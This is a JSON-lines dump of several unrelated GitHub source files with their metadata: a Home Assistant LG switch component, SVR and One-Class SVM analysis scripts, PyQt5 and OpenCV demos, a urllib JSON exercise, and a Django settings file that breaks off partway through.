self._def[ATTR_AVAILABLE_FN](self)\n return self._api.available and self._power_on and is_avail\n\n @property\n def assumed_state(self) -> bool:\n \"\"\"Return True if unable to access real state of the entity.\"\"\"\n return self._api.assumed_state\n\n @property\n def device_state_attributes(self):\n \"\"\"Return the optional state attributes.\"\"\"\n return self._api.state_attributes\n\n @property\n def device_info(self):\n \"\"\"Return the device info.\"\"\"\n return self._api.device_info\n\n def turn_off(self):\n \"\"\"Turn the entity off.\"\"\"\n if ATTR_TURN_OFF_FN not in self._def:\n raise NotImplementedError()\n if self.is_on:\n self._def[ATTR_TURN_OFF_FN](self)\n\n def turn_on(self):\n \"\"\"Turn the entity on.\"\"\"\n if ATTR_TURN_ON_FN not in self._def:\n raise NotImplementedError()\n if not self.is_on:\n self._def[ATTR_TURN_ON_FN](self)\n\n @property\n def _power_on(self):\n \"\"\"Current power state\"\"\"\n if self._api.state:\n return self._api.state.is_on\n return False\n\n def _get_sensor_state(self):\n if ATTR_VALUE_FN in self._def:\n return self._def[ATTR_VALUE_FN](self)\n\n if ATTR_VALUE_FEAT in self._def:\n if self._api.state:\n feature = self._def[ATTR_VALUE_FEAT]\n return self._api.state.device_features.get(feature)\n\n return None\n", "repo_name": "dhahaj/homeassistant_backup", "sub_path": "custom_components/smartthinq_sensors/switch.py", "file_name": "switch.py", "file_ext": "py", "file_size_in_byte": 9193, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "wideq.device.STATE_OPTIONITEM_OFF", "line_number": 49, "usage_type": "name"}, {"api_name": "wideq.device.STATE_OPTIONITEM_ON", "line_number": 50, "usage_type": "name"}, {"api_name": "homeassistant.const.STATE_OFF", "line_number": 49, "usage_type": "name"}, {"api_name": "homeassistant.const.STATE_ON", "line_number": 50, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 55, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 57, "usage_type": "call"}, {"api_name": "wideq.device.DeviceType.WASHER", "line_number": 60, "usage_type": "attribute"}, {"api_name": "wideq.device.DeviceType", "line_number": 60, "usage_type": "name"}, {"api_name": "wideq.device.DeviceType.DRYER", "line_number": 61, "usage_type": "attribute"}, {"api_name": "wideq.device.DeviceType", "line_number": 61, "usage_type": "name"}, {"api_name": "wideq.device.DeviceType.STYLER", "line_number": 62, "usage_type": "attribute"}, {"api_name": "wideq.device.DeviceType", "line_number": 62, "usage_type": "name"}, {"api_name": "wideq.device.DeviceType.DISHWASHER", "line_number": 63, "usage_type": "attribute"}, {"api_name": "wideq.device.DeviceType", "line_number": 63, "usage_type": "name"}, {"api_name": "wideq.device.DeviceType.REFRIGERATOR", "line_number": 64, "usage_type": "attribute"}, {"api_name": "wideq.device.DeviceType", "line_number": 64, "usage_type": "name"}, {"api_name": "wideq.device.DeviceType.RANGE", "line_number": 65, "usage_type": "attribute"}, {"api_name": "wideq.device.DeviceType", "line_number": 65, "usage_type": "name"}, {"api_name": "wideq.FEAT_ECOFRIENDLY", "line_number": 80, "usage_type": "name"}, {"api_name": "wideq.FEAT_EXPRESSFRIDGE", "line_number": 88, "usage_type": "name"}, {"api_name": "wideq.FEAT_EXPRESSMODE", "line_number": 97, "usage_type": "name"}, {"api_name": "wideq.FEAT_ICEPLUS", "line_number": 106, "usage_type": "name"}, {"api_name": "wideq.FEAT_ECOFRIENDLY", "line_number": 83, "usage_type": "name"}, {"api_name": "wideq.FEAT_EXPRESSFRIDGE", "line_number": 91, "usage_type": "name"}, {"api_name": "wideq.FEAT_EXPRESSMODE", "line_number": 100, "usage_type": "name"}, {"api_name": "wideq.FEAT_ICEPLUS", "line_number": 109, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 137, "usage_type": "name"}, {"api_name": "const.LGE_DEVICES", "line_number": 138, "usage_type": "argument"}, {"api_name": "wideq.device.WM_DEVICE_TYPES", "line_number": 145, "usage_type": "name"}, {"api_name": "wideq.device.DeviceType.REFRIGERATOR", "line_number": 162, "usage_type": "attribute"}, {"api_name": "wideq.device.DeviceType", "line_number": 162, "usage_type": "name"}, {"api_name": "homeassistant.helpers.update_coordinator.CoordinatorEntity", "line_number": 170, "usage_type": "name"}, {"api_name": "homeassistant.components.switch.SwitchEntity", "line_number": 170, "usage_type": "name"}, {"api_name": "homeassistant.const.STATE_ON", "line_number": 251, "usage_type": "name"}, {"api_name": "homeassistant.const.STATE_OFF", "line_number": 253, "usage_type": "argument"}, {"api_name": "homeassistant.const.STATE_ON", "line_number": 254, "usage_type": "name"}]} +{"seq_id": "20976042854", "text": "\nimport numpy as np\nfrom time import time\nimport sqlite3 as db\nfrom datetime import datetime\nimport pandas as pd\nfrom sklearn.svm import SVR\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import GridSearchCV\n\nstart = time()\n\n\nforecast_start_dt = '2021-06-21 11:00:00'\n\nduration = 6\n\ndatabase_path = \"/home/sachin/Downloads/RWO_0004_Ventilatoren_00.sqlite\"\n\n\ndef load_required_value(forecast_start_dt):\n train_start_dt = str(pd.Timestamp(forecast_start_dt) - pd.DateOffset(hours=duration, seconds=4))\n forecast_end_dt = str(pd.Timestamp(forecast_start_dt) + pd.DateOffset(hours=duration))\n df_train = create_data_frame(train_start_dt, forecast_start_dt)\n forecast_start_dt = str(pd.Timestamp(forecast_start_dt) - pd.DateOffset(seconds=4))\n df_test = create_data_frame(forecast_start_dt, forecast_end_dt)\n return df_train, df_test\n\ndef create_data_frame(start_date, end_date):\n con = db.connect(database_path)\n start_dt_utc = datetime.timestamp(datetime.strptime(start_date, '%Y-%m-%d %H:%M:%S')) * 1000\n end_dt_utc = datetime.timestamp(datetime.strptime(end_date, '%Y-%m-%d %H:%M:%S')) * 1000\n df = pd.read_sql_query(f\"SELECT time, value FROM Value WHERE sensor_id=1 AND \"\n f\"time >= '{int(start_dt_utc)}' AND time < '{int(end_dt_utc)}'\",\n con)\n df[\"time\"] = df[\"time\"].apply(lambda utc: datetime.fromtimestamp(int(utc / 1000)))\n df.drop_duplicates(subset=\"time\", keep=\"first\", inplace=True)\n df.index = df['time']\n\n df = df.reindex(pd.date_range(start_date,\n end_date,\n freq='S'))\n df.drop('time', axis=1, inplace=True)\n df = df.interpolate().fillna(method='bfill')\n df.drop(df.tail(1).index, inplace=True)\n con.close()\n return df\n\n\ntrain, test = load_required_value(forecast_start_dt)\n\nscaler = MinMaxScaler()\n\ntrain['value'] = scaler.fit_transform(train)\n\ntest['value'] = scaler.transform(test)\n\n\ntrain_data = train.values\ntest_data = test.values\n\ntimesteps=5\n\ntrain_data_timesteps = np.array([[j for j in train_data[i:i+timesteps]] for i in range(0, len(train_data)-timesteps+1)])[ :, :, 0]\n\ntest_data_timesteps = np.array([[j for j in test_data[i:i+timesteps]] for i in range(0, len(test_data)-timesteps+1)])[:, :, 0]\n\nX_train, y_train = train_data_timesteps[:, :timesteps-1], train_data_timesteps[:, [timesteps-1]]\nX_test, y_test = test_data_timesteps[:, :timesteps-1], test_data_timesteps[:, [timesteps-1]]\n\n\nparams = {\n 'kernel': ['rbf', 'linear', 'sigmoid'],\n 'C': [0.001, 0.01, 0.1, 1, 10, 100],\n 'gamma': [0.001, 0.01, 0.1, 1, 10, 100],\n 'epsilon': [0.001, 0.01, 0.1, 1, 10, 100]\n }\n\ngrid_search = GridSearchCV(SVR(), params, cv=5, n_jobs=-1, verbose=1)\n\ngrid_search.fit(X_train, y_train[:, 0])\n\nprint(\"train score - \" + str(grid_search.score(X_train, y_train)))\nprint(\"test score - \" + str(grid_search.score(X_test, y_test)))\n\nprint(\"SVR GridSearch score: \"+str(grid_search.best_score_))\nprint(\"SVR GridSearch params: \")\nprint(grid_search.best_params_)", "repo_name": "sach1n1/Thesis_PoC", "sub_path": "SVR_opt/SVR_CV.py", "file_name": "SVR_CV.py", "file_ext": "py", "file_size_in_byte": 3083, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "time.time", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.DateOffset", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.DateOffset", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.DateOffset", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime.timestamp", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime.timestamp", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 32, "usage_type": "call"}, {"api_name": "pandas.read_sql_query", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 36, "usage_type": "name"}, {"api_name": "pandas.date_range", "line_number": 40, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 79, "usage_type": "call"}, {"api_name": "sklearn.svm.SVR", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "8743189837", "text": "# -*- coding: utf-8 -*-\nfrom PyQt5 import QtWidgets\nimport sys\n\n\nclass AddItem(QtWidgets.QWidget):\n\n def __init__(self):\n super().__init__()\n\n self.initUI()\n\n def initUI(self):\n\n self.setWindowTitle(\"Класс QComboBox\")\n self.resize(300, 90)\n self.comboBox = QtWidgets.QComboBox()\n for i in range(1, 11):\n self.comboBox.addItem(\"Пункт {0}\".format(i), i)\n ico = self.style().standardIcon(\n QtWidgets.QStyle.SP_MessageBoxCritical)\n self.comboBox.addItem(ico, \"Пункт 11\", 11)\n self.button = QtWidgets.QPushButton(\"Получить значение\")\n self.button.clicked.connect(self.on_clicked)\n box = QtWidgets.QVBoxLayout()\n box.addWidget(self.comboBox)\n box.addWidget(self.button)\n self.setLayout(box)\n self.show()\n\n def on_clicked(self):\n print(\"Текст:\", self.comboBox.currentText())\n print(\"Данные:\", self.comboBox.itemData(self.comboBox.currentIndex()))\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n ex = AddItem()\n sys.exit(app.exec_())", "repo_name": "syurskyi/Python_Topics", "sub_path": "140_gui/pyqt_pyside/examples/PyQt_PySide_book/005_Lists and tables/001_Drop-down list/358_addItem_toClass.py", "file_name": "358_addItem_toClass.py", "file_ext": "py", "file_size_in_byte": 1148, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 6, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 6, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QComboBox", "line_number": 17, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 17, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QStyle", "line_number": 21, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 21, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 23, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 25, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 25, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 37, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 37, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 37, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "37783975232", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 26 14:14:46 2020\r\n\r\n@author: Tony_Tien\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\nimport pickle\r\n\r\nfrom sklearn.svm import OneClassSVM\r\nfrom sklearn import ensemble, preprocessing, metrics\r\nfrom datetime import datetime\r\nfrom matplotlib import pyplot as plt\r\nfrom DetrendMethod import detrend_with_lowpass\r\nfrom config import *\r\nfrom calculate import *\r\nfrom ModelTraining import *\r\nfrom plot_function import *\r\n\r\n\r\nHave_cycle_source_data = pd.read_csv(data_path + '{}___Have_cycle_source_data.csv'.format(SourceDataType))\r\n\r\nAll_result = []\r\nfor key,value in tqdm(Have_cycle_source_data.groupby(['source_ip'])):\r\n# key = '192.168.88.178'\r\n value = Have_cycle_source_data.groupby(['source_ip']).get_group(key).copy()\r\n value['weekend'] = value['ds'].apply(lambda x: datetime.strptime(x, \"%Y-%m-%d\").weekday()+1)\r\n basis = value[(value['ds'] >= train_start_date) & (value['ds'] <= train_cut_date)]\r\n mode = 7\r\n \r\n All_mean = []\r\n for i in range(int(len(value)/mode)):\r\n test_data_raw = value[0+i*mode : (i+1)*mode].sort_values(by = ['weekend'])\r\n test_data = test_data_raw['unique_dest_cnt'].values\r\n All_mean.append(np.mean(test_data))\r\n All_log_mean = np.log(All_mean)\r\n \r\n Feature_df = pd.DataFrame({'mean':All_mean,'log_mean':All_log_mean})\r\n Feature_df.loc[0:int(len(basis)/mode)-1,'type'] = 'Training'\r\n Feature_df.loc[int(len(basis)/mode)::,'type'] = 'Testing'\r\n \r\n #跟basis的diff\r\n # basis_high_iqr = basis['total_sent_bytes'].describe()['75%'] + ((basis['total_sent_bytes'].describe()['75%'] - basis['total_sent_bytes'].describe()['25%']))*1.5\r\n # basis_low_iqr = basis['total_sent_bytes'].describe()['25%'] - ((basis['total_sent_bytes'].describe()['75%'] - basis['total_sent_bytes'].describe()['25%']))*1.5\r\n # \r\n # basis_filter = basis[(basis['total_sent_bytes'] > basis_low_iqr) & (basis['total_sent_bytes'] < basis_high_iqr)]\r\n # basis_mean = np.mean(basis_filter['total_sent_bytes'])\r\n \r\n # All_mean_diff = []\r\n # for i in range(int(len(value)/mode)): \r\n # test_data_raw = value[0+i*mode : (i+1)*mode].sort_values(by = ['weekend'])\r\n # test_data = test_data_raw['total_sent_bytes'].values\r\n # mean_diff = np.mean(test_data) - basis_mean\r\n # All_mean_diff.append(mean_diff)\r\n # Feature_df['mean_diff'] = All_mean_diff\r\n Training = Feature_df[Feature_df['type'] == 'Training']['mean'].values\r\n #plt.plot(Training , 'bo')\r\n #plt.ylabel('Mean of each period',fontsize = 12)\r\n #plt.xlabel('week',fontsize = 12)\r\n #plt.grid() \r\n #plt.axhline(np.mean(basis_filter['total_sent_bytes']) + np.std(basis_filter['total_sent_bytes']), color='k',linestyle = '--')\r\n #plt.axhline(np.mean(basis_filter['total_sent_bytes']) - np.std(basis_filter['total_sent_bytes']), color='k',linestyle = '--')\r\n #plt.axhline(np.mean(basis_filter['total_sent_bytes']), color='m',linestyle = '--')\r\n \r\n clf = OneClassSVM(nu=0.2, kernel=\"rbf\", gamma=0.1)\r\n normalize = preprocessing.scale(np.array(All_mean))\r\n train = normalize[0:int(len(basis)/mode)]\r\n test = normalize[int(len(basis)/mode):]\r\n \r\n train = np.reshape(train , (len(train),1))\r\n test = np.reshape(test , (len(test),1))\r\n Train_and_test = np.reshape(np.append(train[0:int(len(basis)/mode)] , test) , (len(np.append(train[0:int(len(basis)/mode)] , test)),1))\r\n clf.fit(train)\r\n clf.predict(test)\r\n predict = clf.predict(Train_and_test)\r\n Feature_df['if_abnormal'] = predict\r\n\r\n up_bound = np.mean(Training) + np.std(Training)\r\n low_bound = np.mean(Training) - np.std(Training)\r\n\r\n Feature_df.loc[(Feature_df['mean'] > low_bound) & (Feature_df['mean'] < up_bound),'if_abnormal_iqr'] = 1\r\n Feature_df['if_abnormal_iqr'] = Feature_df['if_abnormal_iqr'].fillna(-1)\r\n\r\n plt.figure()\r\n plt.scatter(np.arange(len(Feature_df)),Feature_df['mean'] , c = predict)\r\n plt.axvline(int(len(basis)/mode), color='k',linestyle = '--',label = 'train_cut')\r\n\r\n\r\n up_bound = max(Feature_df[(Feature_df['if_abnormal'] ==1) & (Feature_df['type'] =='Training')]['mean'])\r\n low_bound = min(Feature_df[(Feature_df['if_abnormal'] ==1) & (Feature_df['type'] =='Training')]['mean'])\r\n# up_bound = min(Feature_df[(Feature_df['if_abnormal'] ==-1) & (Feature_df['mean'] > normal_max)]['mean'])\r\n# low_bound = max(Feature_df[(Feature_df['if_abnormal'] ==-1) & (Feature_df['mean'] < normal_min)]['mean'])\r\n# up_bound = 1.8297095\r\n# low_bound = -1.5197436\r\n plt.xlabel('period')\r\n plt.ylabel('mean')\r\n plt.axhline(up_bound, color='m',linestyle = '--',label = 'up_bound')\r\n plt.axhline(low_bound, color='m',linestyle = '--',label = 'low_bound')\r\n plt.title('OCSVM (Mean)')\r\n plt.legend()\r\n \r\n Feature_df.loc[ (Feature_df.if_abnormal == -1) & (Feature_df.if_abnormal_iqr == -1),'Last_abnormal'] = -1\r\n Feature_df.loc[~( (Feature_df.if_abnormal == -1) & (Feature_df.if_abnormal_iqr == -1)),'Last_abnormal'] = 1\r\n predict = Feature_df['Last_abnormal'].values\r\n \r\n \r\n value['if_abnormal'] = np.nan \r\n value['period'] = np.nan \r\n source_data = value.copy().reset_index(drop=True)\r\n for i in range(int(len(source_data)/mode)):\r\n source_data.loc[0+i*mode : (i+1)*mode,'if_abnormal'] = predict[i]\r\n source_data.loc[0+i*mode : (i+1)*mode,'period'] = int(i)\r\n \r\n \r\n \r\n #畫異常部分圖\r\n source_data = source_data[~source_data['if_abnormal'].isna()]\r\n normal_part = source_data[source_data['if_abnormal'] == 1]\r\n abnormal_part = source_data[source_data['if_abnormal'] == -1]\r\n normal_part1 = pd.merge(normal_part , source_data[['ds']],on = ['ds'],how='right')\r\n normal_part1 = normal_part1.sort_values(by = ['ds'])\r\n \r\n abnormal_part1 = pd.merge(abnormal_part , source_data[['ds']],on = ['ds'],how='right')\r\n abnormal_part1 = abnormal_part1.sort_values(by = ['ds'])\r\n \r\n \r\n plt.figure(figsize = (20,8))\r\n plt.plot(source_data['ds'],source_data['unique_dest_cnt'],'b')\r\n plt.plot(normal_part1['ds'],normal_part1['unique_dest_cnt'],'b',label = 'Mean Normal')\r\n plt.plot(abnormal_part1['ds'],abnormal_part1['unique_dest_cnt'],'lawngreen',label = 'Mean change')\r\n plt.title(key)\r\n plt.axvline(train_cut_date, color='k',linestyle = '--',label = 'train cut')\r\n plt.xlabel('ds')\r\n plt.ylabel('total_sent_bytes')\r\n plt.xticks(rotation = 90)\r\n plt.legend()\r\n plt.savefig('C:/Users/tony_tien/Desktop/git_project/peakdetection/PeriodChangeDetection/plot/{}.png'.format(key))\r\n plt.close()\r\n \r\n \r\n", "repo_name": "TonyLintz/perioddetection", "sub_path": "AnalysisCode/detect_amplitude.py", "file_name": "detect_amplitude.py", "file_ext": "py", "file_size_in_byte": 6703, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 40, "usage_type": "call"}, {"api_name": "sklearn.svm.OneClassSVM", "line_number": 67, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.scale", "line_number": 68, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 68, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 109, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 110, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 122, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 138, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}]} +{"seq_id": "38077031991", "text": "import json\nimport urllib.request\nimport urllib.error\n\n# URL = 'http://py4e-data.dr-chuck.net/comments_42.json'\nURL = 'http://py4e-data.dr-chuck.net/comments_1136303.json'\n\nprint('Retrieving', URL) # Prints the URL\naddress = urllib.request.urlopen(URL) # Opens a connection to URL\ndata = address.read().decode() # read the data and converts to unicode for python\nprint('Retrieved', len(data), 'characters') # counting the length of data\n\ninfo = json.loads(data) # Creates a JSON object from data\ninfo = info[\"comments\"] # points at the comments key of the object\n\ntotal = 0 # total accumulation of value['count']\ncount = 0 # the number of occurrence of key['count']\n\nfor item in info: # iterate through the info object\n count += 1 # increment count for occurrence\n total += int(item[\"count\"]) # accumulation of sum (parse value as int, as initially its a string)\n\nprint(\"Count: \", count) # print count\nprint(\"Sum: \", total) # print total\n", "repo_name": "CodePalmer-io/UM--JSONtest", "sub_path": "JSONTest.py", "file_name": "JSONTest.py", "file_ext": "py", "file_size_in_byte": 1199, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "urllib.request.request.urlopen", "line_number": 9, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 9, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 9, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "12216991283", "text": "import numpy as np\nimport argparse\nimport cv2 \n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required = True, help = \"Path to the image\")\nargs = vars(ap.parse_args())\n\nimage = cv2.imread(args[\"image\"])\ncv2.imshow(\"Original Image\", image)\ncv2.waitKey(0)\n\nmask = np.zeros(image.shape[:2], dtype = \"uint8\") # create an array of zeros to serve as the mask\n(cX, cY) = (image.shape[1] // 2, image.shape[0] // 2) # compute the center X and Y of the image\ncv2.rectangle(mask, (cX - 75, cY - 75), (cX + 75, cY + 75), 255, -1) # make a rectangle that's 150x150\ncv2.imshow(\"Mask\", mask)\ncv2.waitKey(0)\n\nmaskedImage = cv2.bitwise_and(image, image, mask = mask)\ncv2.imshow(\"Masked Image\", maskedImage)\ncv2.waitKey(0)\n\ncircleMask = np.zeros(image.shape[:2], dtype = \"uint8\")\ncv2.circle(circleMask, (cX, cY), 300, 255, -1) # 300 radius of mask\nmasked = cv2.bitwise_and(image, image, mask = circleMask)\ncv2.imshow(\"Circle Mask on Image\", masked)\ncv2.waitKey(0)", "repo_name": "elibrowne/opencv-work", "sub_path": "masking.py", "file_name": "masking.py", "file_ext": "py", "file_size_in_byte": 963, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "23473414644", "text": "\nimport os\nfrom pathlib import Path\nimport json\nfrom django.core.exceptions import ImproperlyConfigured\n\nBASE_DIR = Path(__file__).resolve().parent.parent\nwith open(os.path.join(BASE_DIR,'credentials.json')) as credentials_file:\n credentials=json.load(credentials_file)\n\ndef get_secret(setting,secrets=credentials):\n \"\"\"Get secret settings or fail with Improperly configured\"\"\"\n try:\n return secrets[setting]\n except KeyError:\n raise ImproperlyConfigured(\"Set the {} setting\".format(setting))\n\n\nSECRET_KEY = get_secret('SECRET_KEY')\n\nDEBUG = True\n\nALLOWED_HOSTS = ['*']\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'core',\n 'baton',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django_countries',\n 'django.contrib.sites',\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n 'corsheaders',\n 'rest_auth',\n 'rest_auth.registration',\n 'rest_framework',\n 'rest_framework.authtoken',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 